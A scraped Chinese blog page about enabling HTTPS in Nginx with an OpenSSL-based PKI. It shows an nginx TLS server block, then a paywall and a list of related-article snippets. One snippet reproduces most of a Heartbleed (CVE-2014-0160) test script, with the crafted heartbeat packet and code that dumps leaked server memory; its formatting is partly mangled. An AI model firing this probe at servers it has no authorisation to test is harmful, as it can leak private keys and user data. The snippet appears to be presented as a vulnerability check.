Nginx启用https -使用openssl进行PKI实践

最新推荐文章于 2024-11-15 12:34:24 发布
原创 最新推荐文章于 2024-11-15 12:34:24 发布
· 476 阅读 · 7 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#nginx #https #运维

本文介绍了如何在已经安装SSL模块和OpenSSL的Nginx服务器上配置SSL,包括添加SSL监听、证书路径设置,以及如何通过公司内部CA申请或自建CA进行证书生成和申请的详细步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前提条件

  1. nginx已安装ssl模块 (可通过nginx -V 命令判断:如果出现 (configure arguments: --with-http_ssl_module), 则已安装)
  2. 服务器已安装openssl (/etc/pki/是OpenSSL 在 RHEL/CentOS上 的默认路径)

具体步骤

  1. 修改nginx配置,在/etc/nginx/nginx.conf 最后加入如下配置:
    # Settings for a TLS enabled server
server {
	listen	443 ssl http2 default_server;
	listen	[::]:443 ssl http2 default_server;
	server_name	_;
	root		/usr/share/nginx/html;
	
	ssl_certificate "/etc/pki/tls/cert.crt";
	ssl_certificate_key "/etc/pki/tls/cert.key";
	ssl_session_cache shared:SSL:1m;
	ssl_session_timeout 10m;
	ssl_ciphers PROFILE=SYSTEM;
	ssl_prefer_server_ciphers on;

	include /etc/nginx/default.d/*.conf;
	
	location / {
	}

	error_page 404 /404.html;
		location = /40x.html {
	}
	
	error_page 500 502 503 504 /50x.html;
		location = /50x.html {
	}
}
  2. 证书创建/申请
    • 一般公司会有专门负责SSL证书申请的组织和
最低0.47元/天 解锁文章
Openssl PKI 相关命令教程,使用RSA算法,成为根CA、生成密钥 PEM、签名申请 CSR、签名 CRT、验签 VERIFY 等等
weixin_42037232的博客
03-13 867
0x00 生成自签CA # 这个证书作为CA根证书,一旦该证书安装,此CA就会被完全信任。 # 首先建立一些文件夹 mkdir ~/myCert cd ~/myCert mkdir demoCA mkdir demoCA/private mkdir demoCA/certs mkdir demoCA/crl mkdir demoCA/newcerts touch demoCA/index...
OpenSSL搭建PKI证书体系
qq_42851449的博客
09-24 758
创建根 CA 证书签名请求文件,指定签名算法为 sha256,默认为 sha1 算法。以文本形式输出请求文件头使用。创建二级CA配置文件。
Nginx配合OpenSSL使用
qq_35827483的博客
12-27 1489
执行这个脚本后,您将得到两个文件:一个是私钥文件(DOMAIN.key),另一个是自签名的证书文件(DOMAIN.crt)。您需要将这两个文件放置到Nginx的SSL目录中,并在Nginx配置文件中引用它们。要为Nginx生成SSL证书,您通常会生成一个私钥和一个证书签名请求(CSR),然后使用这个请求来获取一个由认证机构(CA)签名的证书。每个服务器块(虚拟主机)的配置通常保存在单独的文件中,并包括在。为了让给为让安全的配置更多的使用,参考我的加强完整版本,可能需要根据您的具体需求进一步调整配置。
OpenSSLPKI
weixin_34232617的博客
06-15 227
OpenSSL之安全通讯基础中了解到对称加密,非对称加密,散列函数以及数字签名,CA等技术。那有没有一种框架结合了各种技术来共同完成整个安全通讯呢?这种框架就称为PKIPKI技术与安全服务 公钥基础设施(Public Key Infrastructure,简称PKI)是一种遵循标准的,采用非对称密码算法和技术来实现并提供安全服务的,通用的安全基础设施。它能够透明地...
利用OPENSSL实现PKI
weixin_33755557的博客
08-18 790
PKI即公钥基础设施,包括注册机构(RC),签证机构(CA),证书撤销列表(CRL)发布机构,证书存取库,我们利用openssl来实现以上内容。一,我们来梳理一下常见的加密算法1,对称加密算法常见的对称加密算法有:DES,3DES,AES工作机理:通过移位来达到加密效果适用场景:机密性2,非对称加密算法常见的非对称加密算法有:RSA,DSS,ECC,DH工作机理,通过数学函...
openssl-1.0.2k
05-18
OpenSSL广泛应用于Web服务器(如Apache、Nginx)以实现HTTPS,邮件服务器(如Postfix、 Dovecot),以及其他需要加密通信的软件。此外,它也常被开发人员用来在应用中集成加密功能,如数据存储加密、消息传输加密等...
Nginxhttps功能和防盗链
weixin_56770318的博客
06-05 1017
nginxhttps 功能基于模块ngx_http_ssl_module实现,因此如果是编译安装的nginx使用参数ngx_http_ssl_module开启ssl功能,但是作为nginx的核心功能,yum安装的nginx默认就是开启的,编译安装的nginx需要指定编译参数--with-http_ssl_module开启。总的来说,Nginx通过其灵活的配置和强大的性能,在实现HTTPS功能时提供了丰富的选项和功能。在Nginx中,HTTPS是通过SSL/TLS协议来实现加密和安全通信的功能。
阿里云国际版如何使用NGINX作为HTTPS转发代理服务器
九河智造云的内容中心
05-09 1858
NGINX最初被设计为反向代理服务器。但是,随着不断发展,NGINX也可以作为实现转发代理的选项之一。转发代理本身并不复杂,它解决的关键问题是如何加密HTTPS流量。本文介绍了使用NGINX作为HTTPS流量转发代理的两种方法,以及它们的应用场景和主要问题。 今天87cloud详谈下阿里云国际如何使用NGINX作为HTTPS转发代理服务器 HTTP/HTTPS 转发代理的分类 首先,让我们仔细看看转发代理的分类。 分类依据:代理对客户是否透明 通用代理:在这里,代理地址和端口是在客户端上的浏览器或
centos的nginx开启https使用自签证书
09-14
3. 配置Nginx使用SSL:编辑Nginx配置文件来启用SSL并指定证书的位置。配置文件通常位于 `/etc/nginx/nginx.conf` 或 `/etc/nginx/conf.d/` 目录下的某个文件中。你需要设置 `ssl_certificate` 和 `ssl_certificate_...
使用Openssl进行PKI实践(含多级证书详细步骤)
weixin_33849215的博客
04-02 933
2019独角兽企业重金招聘Python工程师标准>>> ...
opensssl_pthread_Srt_VS2015编译.docx
04-01
讲述了Windows下openssl, pthread, Srt三个开源库编译说明, 因为代码使用了c++ 11的标准,所以三个库都是使用vs2015,希望多大家有所帮助
nginx配置https详细步骤,从安装OpenSSLNginx,到生成证书,nginx配置(包括配置http请求转发到https)等
07-31
网络上很难找到非常详细的关于nginx配置https的全流程,大多都是一小段,要么缺A要么缺B。 本文档通过真实的实践经验,从安装OpenSSLNginx,到利用openssl生成证书,配置nginxhttps(包括配置http请求转发到https)等,详细总结出nginx配置https的步骤,最终能帮助你配置成功。
检查网站是否存在 opensSSL
07-22
#!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') hb = h2bin(''' 18 03 02 00 03 01 40 00 ''') def hexdump(s): for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] hxdat = ' '.join('X' % ord(c) for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) print ' x: %-48s %s' % (b, hxdat, pdat) print def recvall(s, length, timeout=5): endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None print ' ... received message: type = %d, ver = x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return False if typ == 24: print 'Received heartbeat response:' hexdump(pay) if len(pay) > 3: print 'WARNING: server returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return True if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return False
OpenSSL PKI命令教程(简单实现自签CA和数字证书)
weixin_42098322的博客
05-26 745
实验参考: Openssl PKI 相关命令教程,使用RSA算法,成为根CA、生成密钥 PEM、签名申请 CSR、签名 CRT、验签 VERIFY 等等 生成自签CA 证书作为CA根证书,一旦该证书安装,此CA就会被信任 建立文件夹 mkdir ~/myCert cd ~/myCert mkdir demoCA mkdir demoCA/private mkdir demoCA/certs mkdir demoCA/crl mkdir demoCA/newcerts touch demoCA/ind
OpenSSLPKI
weixin_33973600的博客
09-27 715
一、PKIPKI(Public Key Infrastructure)公钥基础设施,是提供公钥加密和数字签名服务的系统或平台,目的是为了管理密钥和证书。在PKI中,为了确保用户的身份及他所持有密钥的正确匹配,公开密钥系统需要一个值得信赖而且独立的第三方机构充当认证中心(Certification Authority,CA),来确认公钥拥有人的真正身份。就像公安局发放...
php nginx开启openssl,使用OpenSSLNginx配置HTTPS证书
weixin_35977770的博客
03-17 484
OpenSSL官方推荐win32可执行文件版下载:一、证书制作1、制作CA证书:ca.key CA私钥:openssl genrsa -des3 -out ca.key 2048制作解密后的CA私钥(一般无此必要):openssl rsa -in ca.key -out ca_decrypted.keyca.crt CA根证书(公钥):openssl req -new -x509 -days 73...
Nginx反向代理并使用OpenSSL生成的证书搭建https服务
QWERTYUIOPPLM123的博客
04-27 836
Nginx反向代理并使用OpenSSL生成的证书搭建https服务,并且关于cookie的domain,path配置,以及值得注意的问题。
利用C++和OpenSSL实现PKI完整指南
最新发布
weixin_35728286的博客
11-15 809
本文还有配套的精品资源,点击获取 简介:本指南深入讲解了如何在C++中使用OpenSSL库实现公开密钥基础设施(PKI)。PKI是基于非对称加密技术,确保数字证书认证和加密通信的安全性。通过详细步骤展示从生成密钥对、证书到证书撤销的整个流程。此外,还会介绍如何在C++中进行加密和解密操作、数字签名的生成和验证,以及如何将PKI集成到SSL/TLS协议中,确保网络通信的安全。...
PKI简介和Ubuntu下openssl关于证书的部分操作(创建CA,申请证书,注销证书)
qq_47767419的博客
05-08 3353
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、PKI(公钥基本结构)简介1、什么是PKI?2、PKI组成PKI的应用二、Ubuntu下openssl关于证书的部分操作1.实验说明(准备)2、构建简单的CA(创建CA根证书)客户端向CA请求证书ca将客户端的证书请求文件CSR认证为CST证书的使用ca对证书注销总结 前言 做本实验时学习引用了以下几篇文章 https://www.jianshu.com/p/5914b504f775 https://zhuanlan.z.
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W如Q扬

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值